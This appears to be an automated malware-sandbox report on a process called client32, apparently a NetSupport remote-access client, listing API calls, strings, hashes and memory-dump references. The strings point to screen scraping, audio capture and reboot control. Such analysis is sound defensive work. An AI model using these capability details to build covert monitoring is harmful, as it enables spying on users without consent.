                                                                                                                                                                • SetLastError.KERNEL32(0000042B,?,?,11107655), ref: 111255DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
                                                                                                                                                                • String ID: ExitProcess$Kernel32
                                                                                                                                                                • API String ID: 109174691-3456457508
                                                                                                                                                                • Opcode ID: 426b738c6fbfa5f74dcb21ca8823c9be9917486caf471f8f95e9508255649407
                                                                                                                                                                • Instruction ID: f8e98d51da87ee85686525c21cd9091351168c3488a54b7e022490e4144d2367
                                                                                                                                                                • Opcode Fuzzy Hash: 426b738c6fbfa5f74dcb21ca8823c9be9917486caf471f8f95e9508255649407
                                                                                                                                                                • Instruction Fuzzy Hash: 21318F75E10229BBDB159FB5C888A9EFB79EF48725F114155F822E3240DB709E00CBA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _memset.LIBCMT ref: 11135335
                                                                                                                                                                • LoadIconA.USER32(00000000,00000455), ref: 11135403
                                                                                                                                                                • _strncpy.LIBCMT ref: 11135425
                                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,59FD48C0,00000000,1102E392,00000001), ref: 11135436
                                                                                                                                                                • LoadIconA.USER32(00000000,0000045C), ref: 11135456
                                                                                                                                                                • GetWindowTextA.USER32(000802A6,?,00000180), ref: 11135478
                                                                                                                                                                • wsprintfA.USER32 ref: 111354F4
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • wsprintfA.USER32 ref: 1113552C
                                                                                                                                                                • wsprintfA.USER32 ref: 1113558D
                                                                                                                                                                • wsprintfA.USER32 ref: 111355E8
                                                                                                                                                                • Shell_NotifyIconA.SHELL32(1102D57D,000001E8,00000001,00000000,59FD48C0,00000000,1102E392,00000001), ref: 11135623
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                                                                                                                • String ID: %s$%s%s$562258$Client$SysTray
                                                                                                                                                                • API String ID: 1881589080-441279933
                                                                                                                                                                • Opcode ID: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                                                                                                • Instruction ID: 2c8920b03c090074b43ba546e334978a2e83067bba728106ef80608c6d9e13b6
                                                                                                                                                                • Opcode Fuzzy Hash: 52564186abc49f02ff9e416bc12bc90c7bb85710abbf43999a324a306af1717a
                                                                                                                                                                • Instruction Fuzzy Hash: EAA15CB1D042159FDB62CF74CC50BAEF7B9BB44719F4045ACE829A7284EB71AA44CF50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                  • Part of subcall function 110B7920: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                  • Part of subcall function 110B7920: GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                  • Part of subcall function 110B7920: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110ED1A0: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                                                                                                • GetSystemMetrics.USER32(00000043), ref: 11027A34
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 11027A5B
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                • wsprintfA.USER32 ref: 11027A85
                                                                                                                                                                • _memset.LIBCMT ref: 11027AC0
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027B15
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11027B2C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11027B35
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
                                                                                                                                                                • String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
                                                                                                                                                                • API String ID: 1724249554-531500863
                                                                                                                                                                • Opcode ID: a3df32cb051b6ffef0dbddb9e1d9e6afedb1f6be11d8f1515118bc7fc445a0ec
                                                                                                                                                                • Instruction ID: 8b64ee8515715f9a467a382f1722012f052f9773485b67a77751752c4120a0ae
                                                                                                                                                                • Opcode Fuzzy Hash: a3df32cb051b6ffef0dbddb9e1d9e6afedb1f6be11d8f1515118bc7fc445a0ec
                                                                                                                                                                • Instruction Fuzzy Hash: AE412C75E4021EAAEB11DBB0CC95FE9F7B8EB14708F5041D8EA19A71C0EB71B540CB54
                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 11003611
                                                                                                                                                                  • Part of subcall function 11142510: SetBkColor.GDI32(?,00000000), ref: 11142524
                                                                                                                                                                  • Part of subcall function 11142510: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11142539
                                                                                                                                                                  • Part of subcall function 11142510: SetBkColor.GDI32(?,00000000), ref: 11142541
                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 11003625
                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 11003630
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1100363B
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100364C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 1100365C
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003673
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 1100368A
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036A1
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036BE
                                                                                                                                                                • GetSysColor.USER32(00000014), ref: 110036D5
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 110036EC
                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 11003703
                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 11003720
                                                                                                                                                                • Rectangle.GDI32(?,?,00000001,?,?), ref: 1100373A
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100374E
                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11003758
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100375E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3698065672-0
                                                                                                                                                                • Opcode ID: 85c92a5ddb3fa2c2e396d8f91cdfef8aadc43ee42c682f1723c19db0d879a3f5
                                                                                                                                                                • Instruction ID: 0acc8f431d394271bb16371b25c06287c3fc210f7a5d9f44f9263931014851e0
                                                                                                                                                                • Opcode Fuzzy Hash: 85c92a5ddb3fa2c2e396d8f91cdfef8aadc43ee42c682f1723c19db0d879a3f5
                                                                                                                                                                • Instruction Fuzzy Hash: 3C517DB5900209AFD714EFA5CC85EFBF7BCEB98704F104A18E612A7291D670B945CBA1
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __localtime64__time64
                                                                                                                                                                • String ID: ?$EVAL$IsA()$authcode$currentver$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$expiredver$expiryday$expirymonth$expiryyear$startday$startmonth$startyear
                                                                                                                                                                • API String ID: 3099643277-245371475
                                                                                                                                                                • Opcode ID: 95701a4e29cf4d46864c7dc7deb441c072c18aa3f1f64dcc333247a8aeecb6d2
                                                                                                                                                                • Instruction ID: ed969fd491221d6f9ddc632703b46658f720054547a2bb076cdef45b618babfb
                                                                                                                                                                • Opcode Fuzzy Hash: 95701a4e29cf4d46864c7dc7deb441c072c18aa3f1f64dcc333247a8aeecb6d2
                                                                                                                                                                • Instruction Fuzzy Hash: 8AB1E336D0428A9BDB01CFB5DE94BDDFBF5AF14358F144468D8117B284EB32AA08CB61
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                                                                                                • API String ID: 2111968516-1286714176
                                                                                                                                                                • Opcode ID: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                                                                                                • Instruction ID: cfced163e91c544f1d9a441fe05b752d20d9a2d0abefb67461bd630bfcd17819
                                                                                                                                                                • Opcode Fuzzy Hash: 16156c97f269215458a29c73816be307994206807deff759477be4abbe46c0e1
                                                                                                                                                                • Instruction Fuzzy Hash: 0C911975A50319AFEB11DFA4CD84FDAF3B4BF88725F1041A8E519A7284EB30AA40CF51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _malloc.LIBCMT ref: 1100B366
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                  • Part of subcall function 1100AC40: EnterCriticalSection.KERNEL32(000000FF,59FD48C0,?,00000000,00000000), ref: 1100AC84
                                                                                                                                                                  • Part of subcall function 1100AC40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACA2
                                                                                                                                                                  • Part of subcall function 1100AC40: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ACEE
                                                                                                                                                                  • Part of subcall function 1100AC40: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD35
                                                                                                                                                                  • Part of subcall function 1100AC40: CloseHandle.KERNEL32(00000000), ref: 1100AD3C
                                                                                                                                                                  • Part of subcall function 1100AC40: _free.LIBCMT ref: 1100AD53
                                                                                                                                                                  • Part of subcall function 1100AC40: FreeLibrary.KERNEL32(?), ref: 1100AD6B
                                                                                                                                                                  • Part of subcall function 1100AC40: LeaveCriticalSection.KERNEL32(?), ref: 1100AD75
                                                                                                                                                                • EnterCriticalSection.KERNEL32(1100CA5A,Audio,DisableSounds,00000000,00000000,59FD48C0,?,1100CA4A,00000000,?,1100CA4A,?), ref: 1100B39B
                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA4A,?), ref: 1100B3B8
                                                                                                                                                                • _calloc.LIBCMT ref: 1100B3E9
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA4A,?), ref: 1100B40F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(1100CA5A,?,1100CA4A,?), ref: 1100B449
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(1100CA4A,?,?,1100CA4A,?), ref: 1100B46E
                                                                                                                                                                Strings
                                                                                                                                                                • DisableSounds, xrefs: 1100B342
                                                                                                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4C3
                                                                                                                                                                • InitCaptureSounds NT6, xrefs: 1100B48E
                                                                                                                                                                • \\.\NSAudioFilter, xrefs: 1100B3B0
                                                                                                                                                                • Audio, xrefs: 1100B347
                                                                                                                                                                • Vista new pAudioCap=%p, xrefs: 1100B4D3
                                                                                                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B4F3
                                                                                                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B51C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                                                                                • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                • API String ID: 1843377891-2362500394
                                                                                                                                                                • Opcode ID: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                                                                                • Instruction ID: 3f9b0c4355a442be161718b687c517c7c1a8a488e2b9041c50d9e3709ff29e90
                                                                                                                                                                • Opcode Fuzzy Hash: f60393b41353c13c745924059a021ceb37060bf1a09b9967f753d73c688ee9b2
                                                                                                                                                                • Instruction Fuzzy Hash: 8E51D9B5E0464AAFE704CF74DC80BAEF7A4FB04759F10467AE929A3240E7717550C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1112523A
                                                                                                                                                                • SendMessageA.USER32(?,0000043C,00000000,?), ref: 11125251
                                                                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 11125280
                                                                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 111252B6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • OleCreateStaticFromData.OLE32(00000000,111C093C,00000002,?,?,?,?), ref: 111253C2
                                                                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 111253D8
                                                                                                                                                                • _memset.LIBCMT ref: 111253E5
                                                                                                                                                                • CoUninitialize.OLE32 ref: 11125499
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                                                                                                • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102B331
                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 1102B38E
                                                                                                                                                                • _fgets.LIBCMT ref: 1102B3C0
                                                                                                                                                                • _strtok.LIBCMT ref: 1102B3E8
                                                                                                                                                                  • Part of subcall function 11163016: __getptd.LIBCMT ref: 11163034
                                                                                                                                                                • _fgets.LIBCMT ref: 1102B424
                                                                                                                                                                • _strtok.LIBCMT ref: 1102B438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                                                                                                • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102EC26,?,?,View,Client,Bridge), ref: 11027550
                                                                                                                                                                • LoadIconA.USER32(00000000,00007D0B), ref: 11027565
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 1102757E
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 11027583
                                                                                                                                                                • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027593
                                                                                                                                                                • LoadIconA.USER32(11000000,00000491), ref: 110275AB
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 110275BA
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 110275BF
                                                                                                                                                                • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 110275D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                                                                • String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1103B8DF
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1103B924
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000010,00000000,00000000), ref: 1103B94F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountMessagePostSleepTick
                                                                                                                                                                • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset
                                                                                                                                                                • String ID: "%s%s" %s$@$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister$nsmexec.exe
                                                                                                                                                                • API String ID: 2102423945-3923501237
                                                                                                                                                                • Opcode ID: 7ba6ce302c47b0503db26e569d52d618a70cb858999b45b22d8d523b2960ff84
                                                                                                                                                                • Instruction ID: 8e24205924474c9bfbc8f8a066ef450270d82c25248a7677aea57b4c17336036
                                                                                                                                                                • Opcode Fuzzy Hash: 7ba6ce302c47b0503db26e569d52d618a70cb858999b45b22d8d523b2960ff84
                                                                                                                                                                • Instruction Fuzzy Hash: B8F18EB5D1071A9FDB25DB64CC80BAEB7BDAF44308F1085ECE51A97241EB71AE84CB50
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,59FD48C0,00000000,00000000,00000000), ref: 1103119A
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                                                                                                • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                                                                                                • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                                                                                                  • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                                                                                                  • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                                                                                                  • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                                                                                                  • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                                                                                                  • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                                                                                                  • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                                                                                • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                                                                                • API String ID: 3887438110-1852639040
                                                                                                                                                                • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                                                                                • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                                                                                                • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                                                                                • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick_malloc_memsetwsprintf
                                                                                                                                                                • String ID: %s|%s$Channel$Client$Delay$NameLookup$_License$serial_no
                                                                                                                                                                • API String ID: 476529905-1572471466
                                                                                                                                                                • Opcode ID: d5ea3294f5018c1b5af9269d5e3c6f9db3afc0f870584c41fa064c38045f5e7d
                                                                                                                                                                • Instruction ID: 7fe4dc2c9c8283dcb924a9d036735a693b6ae83b932d1ebb9d9659e593a33053
                                                                                                                                                                • Opcode Fuzzy Hash: d5ea3294f5018c1b5af9269d5e3c6f9db3afc0f870584c41fa064c38045f5e7d
                                                                                                                                                                • Instruction Fuzzy Hash: 68816BB5E0429B5FDB55CB74CC44BAEBBF5AF45308F1442E8D859EB281DA32E901CB50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,59FD48C0,111F00F8,111E5C98,?), ref: 110B3594
                                                                                                                                                                • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                                                                                                • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                                                                                                • API String ID: 3518726166-774679399
                                                                                                                                                                • Opcode ID: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                                                                                                • Instruction ID: 5c973c881439576bbc97280a0c87cfab299b34d5c0027cf4f030de1918296fe0
                                                                                                                                                                • Opcode Fuzzy Hash: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                                                                                                • Instruction Fuzzy Hash: E5911778E04219AFDB54CFA5C980BADFBF1FB48704F20816AE815AB380D735A941CF58
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • Sleep.KERNEL32(000005DC,?,_License,Product,0000000A,00000000), ref: 110417DB
                                                                                                                                                                  • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
